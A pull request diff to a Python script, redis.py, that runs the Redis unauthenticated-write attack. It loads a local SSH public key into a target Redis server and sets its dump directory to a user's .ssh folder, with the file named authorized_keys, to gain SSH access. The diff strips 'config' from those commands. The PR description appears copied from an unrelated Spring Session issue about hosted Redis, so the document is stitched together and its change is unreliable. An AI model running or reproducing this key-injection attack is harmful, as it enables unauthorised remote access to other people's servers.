### PR TITLE
delete 'config' command in redis-cli

### DIFF
--- a/redis.py
+++ b/redis.py
@@ -35,9 +35,9 @@ if os.path.isfile(PATH) or os.path.isfile(PATH1):
 		os.system(cmd)
 		cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " +  ip_address + ' -x set cracklist'
 		os.system(cmd2)
-		cmd3 = cmd1 + ' config set dbfilename "backup.db" '
-		cmd4 = cmd1 + ' config set  dir' + " /home/"+username+"/.ssh/"
-		cmd5 = cmd1 + ' config set dbfilename "authorized_keys" '
+		cmd3 = cmd1 + ' set dbfilename "backup.db" '
+		cmd4 = cmd1 + ' set  dir' + " /home/"+username+"/.ssh/"
+		cmd5 = cmd1 + ' set dbfilename "authorized_keys" '
 		cmd6 = cmd1 + ' save'
 		os.system(cmd3)
 		os.system(cmd4)


### PR DESCRIPTION
https://github.com/spring-projects/spring-session/issues/124

Redis security recommends disabling the CONFIG command so that remote users cannot reconfigure an instance. The RedisHttpSessionConfiguration requires access to this during its initialization. Hosted Redis services, like AWS ElastiCache disable this command by default, with no option to re-enable it.

correct me if I'm wrong ;)